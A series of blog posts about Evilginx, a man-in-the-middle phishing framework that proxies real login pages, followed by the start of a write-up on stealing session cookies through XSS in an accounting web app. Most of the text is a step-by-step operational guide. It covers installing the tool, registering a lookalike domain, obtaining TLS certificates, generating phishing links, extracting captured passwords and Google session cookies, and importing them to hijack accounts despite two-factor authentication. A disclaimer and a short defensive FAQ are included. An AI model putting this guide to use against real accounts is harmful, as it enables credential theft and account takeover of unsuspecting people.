[+] Added install.sh script that will single-handedly install Evilginx package on Debian.
[+] Added support for adding external site templates in framework-like manner.
[+] Added sites support for following websites: Facebook, Dropbox, Linkedin and new Google sign-in page.
[+] Reorganized code and directory structure to be more accessible for future development.
[+] Redirection URLs can now be embedded into phishing URLs using base64 encoding.
[+] Setup script allows to enable automatic logs parsing every minute.
[+] Setup script automatically handles SSL/TLS certificate retrieval from LetsEncrypt and its renewal.
[+] Added regular expressions for parsing POST arguments via .creds config files.
[+] Fixed: Opening Evilginx site via HTTP will now properly redirect to HTTPS.
[+] Fixed: 'Origin' and 'Referer' HTTP headers are now properly modified.
[+] Fixed: Minor bugs and stability issues.

Installation and Usage

I figured it would be wise to give you a rundown of the updated Evilginx installation, step by step, on a fresh Debian 8 (jessie) VPS, which you can easily host on DigitalOcean (this link gives you a $10 bonus).

Package installation

SSH to your new server, clone the Evilginx GitHub repository and launch the installation script:

apt-get update
apt-get -y install git
git clone https://github.com/kgretzky/evilginx.git
cd evilginx
chmod 700 install.sh
./install.sh

Note for previous Evilginx users: If you want to upgrade your installation, you may need to stop the Nginx service first with service nginx stop. Afterwards, you can launch ./install.sh normally.

This should take a while. If all went well, you should be up and running with the whole Evilginx package installed and ready to rock. If it didn't, submit an issue on the project's GitHub page and I will take a look.

Now, let's list all available site templates:

python evilginx.py setup -l

Listing available supported sites:

 - dropbox (/root/evilginx/sites/dropbox/config)
   subdomains: www
 - google (/root/evilginx/sites/google/config)
   subdomains: accounts, ssl
 - facebook (/root/evilginx/sites/facebook/config)
   subdomains: www, m
 - linkedin (/root/evilginx/sites/linkedin/config)
   subdomains: www

For the sake of this tutorial, we will enable a phishing site using the google site configuration. At this point you should have already registered a domain to use with Evilginx. Let's assume that domain is not-really-google.com. You can register your domain at NameCheap.

Domain setup

You should point your new domain to DigitalOcean's nameservers and create an A record for your domain on DigitalOcean, pointing to your VPS IP address.

Now comes the important part. The listing of available sites includes subdomain information. This is the list of required subdomains that need to be included in your DNS zone configuration for the Evilginx site config to function properly.

You need to create one CNAME entry for each listed subdomain and point it to your registered domain. For example, google requires two CNAME entries:

  1. accounts.not-really-google.com, which will point to not-really-google.com.
  2. ssl.not-really-google.com, which will point to not-really-google.com.

If you do not know how to do any of this, refer to excellent tutorials on DigitalOcean:

  1. How to Point to DigitalOcean Nameservers From Common Domain Registrars
  2. How To Set Up a Host Name with DigitalOcean

Enabling site config

The domain should now be properly set up and all required subdomains should be pointing at the right place. We can now enable the google site configuration for Nginx.

python evilginx.py setup --enable google -d not-really-google.com

The -d not-really-google.com argument specifies the registered domain we own. Follow the prompts, answering Y to every question, and Evilginx should enable log auto-parsing and automatically retrieve SSL/TLS certificates from LetsEncrypt using Certbot.

You should verify that all went well; otherwise you may need to troubleshoot what went wrong and verify that your DNS zones are configured properly. You may also need to give the DNS settings a few hours to propagate, as changes may not take effect instantly.
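
A quick resolution test can confirm the records are in place. Below is a minimal Python sketch (the domain and subdomains are just this tutorial's examples; substitute your own):

import socket

# Tutorial example values - substitute your own domain and subdomains.
DOMAIN = "not-really-google.com"
SUBDOMAINS = ["accounts", "ssl"]  # as listed by: python evilginx.py setup -l

vps_ip = socket.gethostbyname(DOMAIN)
print("{0} -> {1}".format(DOMAIN, vps_ip))

for sub in SUBDOMAINS:
    fqdn = "{0}.{1}".format(sub, DOMAIN)
    try:
        ip = socket.gethostbyname(fqdn)
        status = "OK" if ip == vps_ip else "MISMATCH ({0})".format(ip)
    except socket.gaierror:
        status = "NOT RESOLVING (still propagating?)"
    print("{0} -> {1}".format(fqdn, status))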

Generating the phishing URLs

We will now generate our phishing URLs, which can be sent out:

python evilginx.py genurl -s google -r https://www.youtube.com/watch?v=dQw4w9WgXcQ

Generated following phishing URLs:

 : https://accounts.not-really-google.com/ServiceLogin?rc=0aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj1kUXc0dzlXZ1hjUQ
 : https://accounts.not-really-google.com/signin/v2/identifier?rc=0aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj1kUXc0dzlXZ1hjUQ

The -r https://www.youtube.com/watch?v=dQw4w9WgXcQ argument specifies the URL the victim will be redirected to on successful login. In this scenario, it will be a rickroll video.

As you can see, Evilginx generated two URLs. This is because one is for the old Google sign-in page and the other one is for the new one. You can pick one or the other.
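
As a side note, the rc parameter in the generated URLs appears to be standard URL-safe base64 with the padding stripped, preceded by a single marker character - that's my reading of the output, not a description of evilginx.py's internals. Under that assumption, recovering the redirection URL takes a few lines of Python:

import base64

rc = "0aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj1kUXc0dzlXZ1hjUQ"

blob = rc[1:]                    # assumption: the first character is a marker, not base64
blob += "=" * (-len(blob) % 4)   # restore the stripped padding
print(base64.urlsafe_b64decode(blob).decode())
# -> https://www.youtube.com/watch?v=dQw4w9WgXcQ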

Every minute, Evilginx will parse the logs. If anyone got phished and performed a successful login, their login credentials and session cookies will be saved in the logs directory under the Evilginx root directory.

Session cookies can be imported using the EditThisCookie extension for Chrome. If you want to see the whole process, you may want to watch a slightly outdated demonstration video of Evilginx (everything is up-to-date except for the shell commands):

Epilogue

I hope this update puts Evilginx on its path to greatness! From now on, I want to focus on adding support for more popular websites. If you happen to succeed in creating your own templates for Evilginx and want to share them, please contact me and I may put your template into the official Evilginx repository.

I am constantly looking for interesting projects to work on!

Do not hesitate to contact me if you happen to be working on projects that require:

  • Reverse Engineering
  • Development of Security Software
  • Web / Mobile Application Penetration Testing
  • Offensive Tools for Red Team Assessments

If you have any feedback or suggestions, contact me via the comment section, via Twitter @mrgretzky or directly via e-mail at [email protected].

Evilginx GitHub Repository

https://github.com/kgretzky/evilginx

Follow me on Twitter if you want to stay up to date.

Stay tuned for more updates and other posts!

Evilginx - Advanced Phishing with Two-factor Authentication Bypass

Welcome to my new post! Over the past several months I've been researching new phishing techniques that could be used in penetration testing assignments. Almost every assignment starts with grabbing the low-hanging fruit, which are often employees' credentials obtained via phishing.

In today's post I'm going to show you how to make your phishing campaigns look and feel the best way possible.

I'm releasing my latest Evilginx project, which is a man-in-the-middle attack framework for remotely capturing credentials and session cookies of any web service. It uses the Nginx HTTP server to proxy the legitimate login page to visitors, and captures credentials and session cookies on-the-fly. It works remotely, uses a custom domain and a valid SSL certificate. I have decided to phish Google services for the Evilginx demonstration, as there is no better way to assess this tool's effectiveness than stress-testing the best anti-phishing protections available.

Please note that Evilginx can be adapted to work with any website, not only with Google.

Enjoy the video. If you want to learn more on how this attack works and how you can implement it yourself, do read on.

Disclaimer: This project is released for educational purposes and should be used only in legitimate penetration testing assignments with written permission from to-be-phished parties.

How it works
  1. Attacker generates a phishing link pointing to his server running Evilginx: https://accounts.notreallygoogle.com/ServiceLogin?rc=https://www.youtube.com/watch?v=dQw4w9WgXcQ&rt=LSID
    Parameters in the URL stand for:
    rc = On successful sign-in, the victim will be redirected to this link, e.g. a document hosted on Google Drive.
    rt = This is the name of the session cookie which is set in the browser only after successful sign-in. If this cookie is detected, it is an indication for Evilginx that the sign-in was successful and the victim can be redirected to the URL supplied by the rc parameter.
  2. Victim receives attacker's phishing link via any available communication channel (email, messenger etc.).
  3. Victim clicks the link and is presented with Evilginx's proxied Google sign-in page.
  4. Victim enters his/her valid account credentials, progresses through the two-factor authentication challenge (if enabled) and is redirected to the URL specified by the rc parameter. At this point an rd cookie is saved for the notreallygoogle.com domain in the victim's browser. From now on, if this cookie is present, the victim will be immediately redirected to the rc URL when the phishing link is re-opened.
  5. Attacker now has the victim's email and password, as well as session cookies that can be imported into the attacker's browser in order to take full control of the logged-in session, bypassing any two-factor authentication protections enabled on the victim's account.
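
To make the success condition behind the rt parameter concrete, here is a tiny sketch of the check it implies - my illustration, not Evilginx's actual code: scan the set-cookie headers returned by the proxied server for the named session cookie.

# Illustrative sketch of the rt-cookie success check; not Evilginx's actual code.
def signin_succeeded(set_cookie_headers, rt_name):
    """Return True if any set-cookie header sets the cookie named rt_name."""
    for header in set_cookie_headers:
        name = header.split("=", 1)[0].strip()
        if name == rt_name:
            return True
    return False

# Example: Google's session cookie is LSID, as used in the URL above.
headers = ["NID=abc; path=/", "LSID=xyz; path=/; secure; HttpOnly"]
print(signin_succeeded(headers, "LSID"))  # True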

Let's take a few steps back and try to define the main obstacles in traditional phishing efforts.

The first and major pain with phishing for credentials is two-factor authentication. You can create the best-looking template that yields you dozens of logins and passwords, but you will eventually get roadblocked when asked for a verification token that arrived via SMS. Not only will it stop you from progressing further, but it will also tip off the account owner when they receive a login attempt alert.

The second issue with phishing templates is that they must accept any login and password, as they have no means of confirming their validity. That will, at times, leave you with invalid credentials.

The third issue is having to create the phishing templates themselves. I don't know about you, but for me the process of copying the site layout, stripping javascript, fixing CSS and writing my own replacements for the stripped javascript code to make the login screen behave like the original is extremely annoying. It feels bad to recreate something which has already been done.

In the past several months I worked on my own ettercap-like HTTP proxy software written in C++, using the Boost::Asio library for maximum efficiency. I implemented SSLstrip, DNS spoofing and HSTS bypass. This solution worked perfectly on a Local Area Network, but I wondered if the same ideas could be repurposed for remote phishing, without the need for custom-made software.

I had a revelation when I read an excellent blog post by @i_bo0om. He used the Nginx HTTP server's proxy_pass feature and the sub_filter module to proxy the real Telegram login page to visitors, intercepting credentials and session cookies on-the-fly using man-in-the-middle attacks. This article made me realize that Nginx could be used as a proxy for external servers, and it sparked the idea for Evilginx. The idea was perfect - simple and yet effective.

Allow me to talk a bit about Evilginx's research process, before I focus on installation and usage.

Evilginx Research

The core of Evilginx is the usage of Nginx's HTTP proxy module. It allows passing clients' requests to another server. This basically allows the Nginx server to act as a man-in-the-middle agent, effectively intercepting all requests from clients, modifying and forwarding them to the other server. Later, it intercepts the server's responses, modifies them and forwards them back to clients. This setup allows Evilginx to capture credentials sent in POST request packets and, upon successful sign-in, capture valid session cookies sent back from the proxied server.

In order to prevent the visitor from being redirected to the real website, all URLs containing the real website's domain, retrieved from the server, need to be replaced with the Evilginx phishing domain. This is handled by the sub_filter module provided by Nginx.
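
To illustrate the idea (a toy sketch only, not Evilginx's actual site config; the domains are this post's examples):

server {
    server_name accounts.notreallygoogle.com;

    location / {
        # Forward the visitor's requests to the real server...
        proxy_pass https://accounts.google.com;
        proxy_set_header Host accounts.google.com;
        proxy_set_header Accept-Encoding "";  # keep responses uncompressed so they can be rewritten

        # ...and rewrite the real domain to the phishing domain in every response.
        sub_filter "accounts.google.com" "accounts.notreallygoogle.com";
        sub_filter_once off;
    }
}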

Nginx implements its own logging mechanism, which will log every request in detail, including the POST body and the cookie: and set-cookie: headers. I created a Python script named evilginx_parser.py that will parse the Nginx log, extract credentials and session cookies, and save them in corresponding directories, for easy management.

There is one big issue in Nginx's logging mechanism that almost prevented Evilginx from being finished.

Take a look at the following Nginx configuration line that specifies the format in which log entries should be created:

log_format foo '$remote_addr "$request" set_cookie=$sent_http_set_cookie';

The variable $sent_http_set_cookie stores the value of the set-cookie response header. These headers will contain session cookies returned from the server on successful authorization, and they have to be included in the output of Nginx's access log.
The issue is, HTTP servers return cookies in multiple set-cookie headers, like so:

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: JSESSIONID=this_is_the_first_cookie; path=/; secure; HttpOnly
Set-Cookie: APPID=this_is_the_second_cookie; path=/;
Set-Cookie: NSAL33TTRACKER=this_is_the_third_cookie; path=/;
Server: nginx
Connection: close

For some reason Nginx's $sent_http_set_cookie variable doesn't store set-cookie header values as an array. Instead it stores only the value of the first seen set-cookie header, which in our example would be JSESSIONID=this_is_the_first_cookie; path=/; secure; HttpOnly. This is a huge problem, as it means only one cookie is logged and the rest are lost. While searching the internet for possible solutions, I came across posts from 2011 about the same issue, reported by hopeless sysadmins and developers. I was positive that Nginx itself did not have any workaround.

I had two options:

  1. Modifying Nginx source code and fixing the issue myself.
  2. Developing a custom Nginx module that would allow for better packet parsing.

After a while, I knew that neither of the two options was viable. Both would have required me to spend a huge amount of time understanding the internals of Nginx, which I neither wanted to do nor had the time for on a side project.

Thankfully, I came across some interesting posts about using the LUA scripting language in Nginx configuration files. I learned about OpenResty, an Nginx modification which allows putting small scripts into site configuration files to handle packet parsing and data output.

The OpenResty website describes itself as follows:

OpenResty® is a full-fledged web platform that integrates the standard Nginx core, LuaJIT, many carefully written Lua libraries, lots of high quality 3rd-party Nginx modules, and most of their external dependencies. It is designed to help developers easily build scalable web applications, web services, and dynamic web gateways.

I found out that by using LUA scripting, it was possible to access set-cookie headers as an array.

Here is an example function that returns all set-cookie header values as an array:

function get_cookies()
	-- ngx.header.set_cookie is a plain string when the response carries a
	-- single set-cookie header, and a table when it carries several
	local cookies = ngx.header.set_cookie or {}
	if type(cookies) == "string" then
		cookies = {cookies}	-- normalize the single-header case to a table
	end
	return cookies
end

The big issue with logging cookies was resolved, and the best part was that LUA scripting allowed much more in terms of packet modification than vanilla Nginx, e.g. modification of response packet headers.

The rest of the development followed swiftly. I will explain the more interesting aspects of the tool as I guide you through installing and setting up everything from scratch.

Getting Your Hands Dirty

[UPDATE 2017-04-26] I've released a new version of Evilginx, which makes the installation process described in this post slightly out-of-date. For new installation instructions, refer to the latest post about the Evilginx 1.0 Update.

First of all, we need a server to host Evilginx. I've used a Debian 8.7 x64 512MB RAM VPS hosted on Digital Ocean. If you use this link and create an account, you will get a free $10 to spend on your servers. I've used the cheapest $5/mo server, so that should give you 2 months extra - and seriously, Digital Ocean is the best hosting company I've ever used.

Once our server is up and running, we need to log into it and perform upgrades, just in case:

apt-get update
apt-get upgrade

We will also need a domain that will point to our VPS. I highly recommend buying one from NameCheap (yes, this is my affiliate link, thanks!). They have never let me down and support is top notch.

I won't cover here how to set up your newly bought domain to point at your newly bought VPS. You can find excellent tutorials on Digital Ocean:

  1. How to Point to DigitalOcean Nameservers From Common Domain Registrars
  2. How To Set Up a Host Name with DigitalOcean

For the remainder of this post, let's assume that our registered domain is notreallygoogle.com.

Installing OpenResty/Nginx

Now we can proceed to install OpenResty. We will be installing it from source. At the time of writing, the most current version was 1.11.2.2; if you want a newer version, check the download page for more up-to-date links.

mkdir dev
cd dev
wget https://openresty.org/download/openresty-1.11.2.2.tar.gz
tar zxvf openresty-1.11.2.2.tar.gz
cd openresty-1.11.2.2

With OpenResty unpacked, we need to install the compiler and dependency packages required to build it. The following will install Make, the GCC compiler, and the PCRE and OpenSSL development libraries:

apt-get -y install make gcc libpcre3-dev libssl-dev

Before we compile the sources, we need to configure the installation. The following line will do the job of putting the Nginx binaries, logs and config files into proper directories. It will also enable sub_filter module and LuaJIT functionality.

./configure --user=www-data --group=www-data --prefix=/etc/nginx --sbin-path=/usr/sbin/nginx --conf-path=/etc/nginx/nginx.conf --error-log-path=/var/log/nginx/error.log --http-log-path=/var/log/nginx/access.log --pid-path=/var/run/nginx.pid --lock-path=/var/run/nginx.lock --with-http_ssl_module --with-pcre --with-http_sub_module --with-luajit

At this point, we are ready to compile and install.

make
make install

If all went well, we can verify that OpenResty was installed properly:

# nginx -v
nginx version: openresty/1.11.2.2

From now on, I will refer to OpenResty as Nginx. I believe it will make it less confusing.

Setting up the daemon

Nginx is now installed, but it currently won't start at boot or keep running in the background. We need to create our own systemd service unit (note the quoted 'EOF' below, which keeps the shell from expanding $MAINPID inside the heredoc):

cat <<'EOF' > /etc/systemd/system/nginx.service
[Unit]
Description=The NGINX HTTP and reverse proxy server
After=syslog.target network.target remote-fs.target nss-lookup.target

[Service]
Type=forking
PIDFile=/run/nginx.pid
ExecStartPre=/usr/sbin/nginx -t
ExecStart=/usr/sbin/nginx
ExecReload=/bin/kill -s HUP $MAINPID
ExecStop=/bin/kill -s QUIT $MAINPID
PrivateTmp=true

[Install]
WantedBy=multi-user.target
EOF

Before we launch our service for the first time, we have to properly configure Nginx.

Nginx configuration

We need to open the Nginx configuration file /etc/nginx/nginx.conf with any text editor and make sure to add include /etc/nginx/sites-enabled/*; in the http {...} block. After modification, it should look something like this:

...
http {
    include       mime.types;
    default_type  application/octet-stream;

    include /etc/nginx/sites-enabled/*;
    ...
}

From now on, Nginx will look for our site configurations in the /etc/nginx/sites-enabled/ directory, where we will be putting symbolic links to files residing in the /etc/nginx/sites-available/ directory. Let's create both directories:

mkdir /etc/nginx/sites-available/ /etc/nginx/sites-enabled/

We need to set up our phishing site configuration for Nginx. We will use the site configuration for phishing Google users that is included with the Evilginx package. The easiest way to stay up-to-date is to clone the Evilginx GitHub repository.

apt-get -y install git
cd ~
mkdir tools
cd tools
git clone https://github.com/kgretzky/evilginx
cd evilginx

Now copy Evilginx's site configuration template to the /etc/nginx/sites-available/ directory. We will also replace all occurrences of {{PHISH_DOMAIN}} in the template file with the name of the domain we registered, which in our case is notreallygoogle.com. When that's done, create a symbolic link to our new site configuration file in the /etc/nginx/sites-enabled/ directory:

cp ./sites/evilginx-google-template.conf /etc/nginx/sites-available/evilginx-google.conf
sed -i 's/{{PHISH_DOMAIN}}/notreallygoogle.com/g' /etc/nginx/sites-available/evilginx-google.conf
ln -s /etc/nginx/sites-available/evilginx-google.conf /etc/nginx/sites-enabled/

We are almost ready. One remaining step is to install our SSL/TLS certificate to make the Evilginx phishing site look legitimate and secure. We will use a free LetsEncrypt SSL/TLS certificate for this purpose.

Installing SSL/TLS certificates

EFF has released an incredibly easy to use tool for obtaining valid SSL/TLS certificates from LetsEncrypt. It's called Certbot and we will use it right now.

Open your /etc/apt/sources.list file and add the following line:

deb http://ftp.debian.org/debian jessie-backports main

Now install Certbot:

apt-get update
apt-get install certbot -t jessie-backports

If all went well, we should be able to obtain our certificates now. Make sure Nginx is not running, as Certbot will need to open the HTTP ports for LetsEncrypt to verify ownership of our server. Enter the following command and proceed through the prompts:

certbot certonly --standalone -d notreallygoogle.com -d accounts.notreallygoogle.com

On success, our private key and public certificate chain will find their place in the /etc/letsencrypt/live/notreallygoogle.com/ directory. Evilginx's site configuration already includes a setting to use SSL/TLS certificates from this directory.

Please note that LetsEncrypt certificates are valid for 90 days, so if you plan to use your server for more than 3 months, you can add the certbot renew command to your /etc/crontab and have it run every day. This will make sure your SSL/TLS certificate is renewed whenever it's bound to expire in 30 days or less.
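
For example, a daily /etc/crontab entry could look like the following (note that /etc/crontab lines include a user field; depending on your Certbot version you may also want pre/post hooks so the standalone verifier can bind to port 80):

0 3 * * * root certbot renew --quiet --pre-hook "service nginx stop" --post-hook "service nginx start"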

Starting up

Everything is ready for launch. Make sure your Nginx daemon is enabled and start it:

systemctl enable nginx
systemctl start nginx

Check if Nginx started properly with systemctl status nginx and make sure that both ports 80 and 443 are now opened by the Nginx process, by checking output of netstat -tunalp.

If anything went wrong, try to retrace your steps and see if you did everything properly. Do not hesitate to report issues in the comments section below or even better, file an issue on GitHub.

In order to create your phishing URL, you need to supply two parameters:

  1. rc = On successful sign-in, the victim will be redirected to this link, e.g. a document hosted on Google Drive.
  2. rt = This is the name of the session cookie which is set in the browser only after successful sign-in. If this cookie is detected, it is an indication for Evilginx that the sign-in was successful and the victim can be redirected to the URL supplied by the rc parameter.

Let's say we want to redirect the phished victim to a rickroll video on Youtube, and we know for sure that Google's session cookie name is LSID. The URL should look like this:

https://accounts.notreallygoogle.com/ServiceLogin?rc=https://www.youtube.com/watch?v=dQw4w9WgXcQ&rt=LSID

Try it out and see if it works for your own account.

Capturing credentials and session cookies

Nginx's site configuration is set up to output data into the /var/log/evilginx-google.log file. This file will store all relevant parts of the requests and responses that pass through Nginx's proxy. The log contents are hard to analyze by hand, but we can automate the parsing.

I wrote a small Python script called evilginx_parser.py, which will parse Nginx's log files and extract only credentials and session cookies from them. Those will be saved in separate files, in directories named after the extracted accounts' usernames.

I assume you've now tested your Evilginx setup by phishing your own account's session. Let's try to extract your captured data. Here is the script's usage page:

# ./evilginx_parser.py -h
usage: evilginx_parser.py [-h] -i INPUT -o OUTDIR -c CREDS [-x]

optional arguments:
  -h, --help            show this help message and exit
  -i INPUT, --input INPUT
                        Input log file to parse.
  -o OUTDIR, --outdir OUTDIR
                        Directory where output files will be saved.
  -c CREDS, --creds CREDS
                        Credentials configuration file.
  -x, --truncate        Truncate log file after parsing.

All arguments should be self-explanatory, apart maybe from --creds and --truncate. The --creds argument specifies the input config file, which tells the script what kind of data we want to extract from the log file.

Creds config file google.creds, made for Google, looks like this:

[creds]
email_arg=Email
passwd_arg=Passwd
tokens=[{"domain":".google.com","cookies":["SID", "HSID", "SSID", "APISID", "SAPISID", "NID"]},{"domain":"accounts.google.com","cookies":["GAPS", "LSID"]}]

The creds file provides the sign-in form's username and password parameter names. It also specifies a list of cookie names that manage the user's session, with their assigned domain names. These will be intercepted and captured.

It is very easy to create your own .creds config files if you decide to implement phishing of other services with Evilginx.
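
To get a feel for how little is needed to consume such a file, here is a minimal parsing sketch using Python's standard library - an illustration of the format, not evilginx_parser.py's actual code:

import configparser
import json

cfg = configparser.ConfigParser()
cfg.read("google.creds")

email_arg = cfg.get("creds", "email_arg")        # POST parameter holding the username
passwd_arg = cfg.get("creds", "passwd_arg")      # POST parameter holding the password
tokens = json.loads(cfg.get("creds", "tokens"))  # session cookies to capture, per domain

for entry in tokens:
    print(entry["domain"], entry["cookies"])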

If you supply the -x/--truncate argument, the script will truncate the log file after parsing it. This is useful if you want to automate the execution of the parser to run every minute, using cron.

Example usage of the script:

# ./evilginx_parser.py -i /var/log/evilginx-google.log -o ./logs -c google.creds -x

That should put the extracted credentials and cookies into the ./logs directory. Accounts are organized into separate directories, in which you will find files containing login attempts and session cookies.

Session cookies are saved in JSON format, which is fully compatible with the EditThisCookie extension for Chrome. Just pick the Import option in the extension's window and copy-paste the JSON data into it to impersonate the captured session.

Keep in mind that it is often best to clear all cookies from your browser before importing.

After you've imported the intercepted session cookies, open Gmail for example and you should be on the inside of the captured account.

Congratulations!

Session Hijacking FAQ

I figured many of you may not be familiar with the method of hijacking session tokens. I'd like to shed some light on the subject by answering some questions I often get.

Does session hijacking allow an attacker to take full control of the account, without the need to even know the user's account password?

Yes. When you import another account's session cookies into your browser, the server has no option but to trust that you are indeed the person who logged into that account.

How is this possible? Shouldn't there be protections to prevent this?

The only variable that is hard for the attacker to control is the source IP address. Most web services handling critical data (e.g. banks) should not allow the same session token to be used from multiple IP addresses at the same time. It would be wise to detect such a scenario and then invalidate the session token, requiring both parties to log in again. As far as I've tested, Google doesn't care about the IP address of the client that uses a valid session token. The attacker's IP can be on a different continent and it still won't raise any red flags for the legitimate account owner.

I believe the only reason why Google allows simultaneous access to accounts from different IPs using the same session token is user experience. Imagine how many users switch their IPs while they have constant access to their Google services. They have Google signed in on their phone and PC, and they move between the coffee shop, work and home, where they use different wireless networks, VPNs or 3G/4G networks.

If Google were to invalidate session tokens every time an IP change was detected, it would make using their services a nightmare, and people would switch to easier-to-use alternatives.

And, no, Google Chrome does not perform any OS fingerprinting to verify the legitimate owner's machine. It would be of limited use, as it would provide less protection for people using other browsers (Firefox, Safari, Opera), and even if they did fingerprint the OS, the telemetry would have to be sent to the server somehow during the user's sign-in. That channel could inevitably also be hijacked.

Does the account owner get any alerts when they try to log into Google through the Evilginx phishing site?

Yes. On successful login, the account owner will receive a push notification on their Android phone (registered with the same Google account) and an e-mail to their address, with information that someone logged into their account from an unknown IP address. The IP address will be that of the Evilginx server, as it acts as the man-in-the-middle proxy and all requests to the Google server originate from it.

The attacker can easily delete the "Unknown sign-in alert" e-mail after getting access to the account, but there will be no way for them to remove the push notification sent to the owner's Android phone.

The issue is, some people may ignore the alert, which will arrive right after they personally sign in through the Evilginx phishing site. They may take it for a false positive, as they did sign in a minute earlier.

How would this attack fare against hardware two-factor authentication solutions?

Edit (2017/04/07):
Apparently U2F "security key" solutions check the domain you're logging into when the two-factor token is generated. In such a scenario the attack won't work, as the user won't be able to log in, because the phishing domain is present instead of the legitimate one.

Thanks to kind readers who reported this!

Two-factor authentication protects the user only during the sign-in process. If the user's password is stolen, 2FA acts as a backup security measure, using an additional communication channel that is less likely for an attacker to compromise (personal phone, backup e-mail account, hardware PIN generators).

On successful login, using any form of two-factor authentication, the server has to save session cookies in the account owner's browser. These will be required by the server to verify the account owner on every subsequent request.

At this point, if the attacker is in possession of the session cookies, the 2FA method used no longer matters: the account has already been compromised, since the user successfully logged in.

What will happen if I don't tick the "Remember me" checkbox on the Evilginx phishing page, which should make the session token temporary?

A temporary session token will be sent to the user's browser as a cookie with no expiration date. This lets the browser know to remove the cookie from its cache when the browser is closed. Evilginx will still capture the temporary session token, and during extraction it will add its own +2 years expiration date, making the token permanent this time.
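
Sketched in Python, that extraction-time rewrite amounts to something like this (illustrative only; the field names follow Chrome's cookie JSON conventions and may differ from the parser's actual output):

import time

def make_permanent(cookie):
    """Turn a captured browser-session cookie into a persistent one."""
    cookie = dict(cookie)
    cookie["session"] = False  # no longer a browser-session cookie
    cookie["expirationDate"] = time.time() + 2 * 365 * 86400  # +2 years
    return cookie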

If the server doesn't have any mechanism to invalidate temporary session tokens after a period of time, the tokens it issued may be used by an attacker for a long time, even after the account owner closes their browser.

What can I do if my session token gets stolen? How do I prevent the attacker from accessing my account?

At this point, the best thing you can do is change your password. Mature services like Google will then invalidate all session tokens active on your account. Additionally, your password will have changed, so the attacker won't be able to use it to log back in.

Google also provides a feature to see the list of all your active sessions, where you can invalidate them as well.

How do I not get phished like this?

Do NOT only check whether the website you are logging in to has HTTPS with a secure lock icon in the address bar. That only means that the data between you and the server is encrypted, and it won't matter if a malicious attacker secures the data transport between you and their server.

Most important is to check the domain in the address bar. If the address of the sign-in page looks like this: https://accounts.mirrorgoogle.com/ServiceLogin?blahblah, put the domain name mirrorgoogle.com directly into Google search. If nothing legitimate comes up, you can be fairly sure that you are being phished.

Conclusion

I need to stress that Evilginx is not exploiting any vulnerability. Google still does a terrific job of protecting its users from this kind of threat. Because Evilginx acts as a proxy between the user and Google's servers, Google will see the proxy server's IP as the client, not the user's real IP address. As a result, the user will still receive an alert that their account was accessed from an unknown IP (especially if the Evilginx server is hosted in a different country than the one the phished user resides in).

I released this tool as a demonstration of how far attackers can go in the hunt for your accounts and private data. If one were to fall for such a ploy, not even two-factor authentication would help.

If you are a penetration tester, feel free to use this tool in testing security and threat awareness of your clients.

In the future, if the feedback is good, I plan to write a post going into details on how to create your own Evilginx configuration files in order to add support for phishing any website you want.

I am constantly looking for interesting projects to work on!

Do not hesitate to contact me if you happen to be working on projects that require:

  • Reverse Engineering
  • Development of Security Software
  • Web / Mobile Application Penetration Testing
  • Offensive Tools for Red Team Assessments

I am extremely passionate about what I do and I like to work with people smarter than I am.

As always, if you have any suggestions, ideas or you just want to say "Hi", hit me up on Twitter @mrgretzky or directly via e-mail at [email protected].

You can find Evilginx project on GitHub here:
Evilginx on GitHub

Till next time!

Sniping Insecure Cookies with XSS

In this post I want to talk about improper implementation of session tokens and how one XSS vulnerability can result in the full compromise of a web application. The following analysis is based on an existing real-life web application. I cover the step-by-step process that led to the takeover of an administrator's account, and I share my thoughts on what could have been done to better secure the application.

Recently, I performed a penetration test of a web application developed by the company that handles my accounting. I figured that my own financial data is only as secure as the application itself, so I decided to poke around and see what flaws I was able to find.

The accounting application that I will be talking about lets users check unpaid invoices, see urgent messages from the accounting staff, and stay up to date on how much needs to be paid to various financial institutions.

One of the first things I do when starting a new web penetration test is finding out how session tokens are generated and handled. This often gives me quick insight into what I may be up against.

Meet the Token

As I found out, the application relies heavily on a REST API, and the site content is generated dynamically using AngularJS with asynchronous requests.

I started by signing into my account. The sign-in packet sent to the REST backend looked as follows:

POST /tokens HTTP/1.1
Host: app.accounting.com:10443
Connection: close
Content-Length: 64
Accept: application/json, text/plain, */*
Origin: https://app.accounting.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Content-Type: application/json
Referer: https://app.accounting.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.8

{"email":"[email protected]","password":"super_secret_passwd"}

The response to my sign-in attempt with valid credentials looked like this:

HTTP/1.1 200 OK
Server: nginx/1.6.2 (Ubuntu)
Date: Wed, 15 Mar 2017 11:23:23 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 356
Connection: close
Vary: Accept-Encoding
Request-Time: 121
Access-Control-Allow-Origin: *

{"value":"eyJhbGciOiJIUzI1NiJ9.eyJ0b2tlblR5cGUiOiJBVVRIT1JJWkUiLCJleHAiOjE0ODk2NjM0MDMsImlkIjo3N30.5ThxcQysb8kEGTItrCfMzL82H982Pc2wkjcapE4Azgg","account":{"id":77,"email":"[email protected]","status":"ACTIVE","role":"CLIENT_ADMIN","firstName":"John","lastName":"Doe","creationDate":"2016-01-22T18:14:23+0000"},"expirationDate":"2017-03-16T11:23:23+0000"}

The server replied with what looked like a session token and information about my account. The whole JSON reply, as I found out, was later saved into a globals cookie, presumably to be accessible by the AngularJS client-side scripts. I learned that the globals cookie was saved without the secure or http-only flags set.

Without the http-only flag, the cookie is accessible from javascript running under the same domain, which I assumed was intended behaviour, as the client-side scripts could retrieve its data to populate website contents and use the session token in AJAX requests to the REST backend. For cookies without the http-only flag set, it often ends badly once a single XSS vulnerability is discovered.

The lack of a secure flag on the cookie allows for its theft via a man-in-the-middle attack. The attacker can just inject <img src="http://app.accounting.com/"> into browsed HTTP traffic and intercept the resulting HTTP request, including the session token cookie, which will be sent over the unencrypted HTTP channel. It also doesn't help that the application doesn't have HTTP Strict Transport Security enabled in its response headers.
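
For reference, HSTS is a single response header that tells browsers to refuse plain-HTTP connections to the domain (the max-age value below is just the common one-year example):

Strict-Transport-Security: max-age=31536000; includeSubDomains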

Let's focus on the session token itself, which reads:

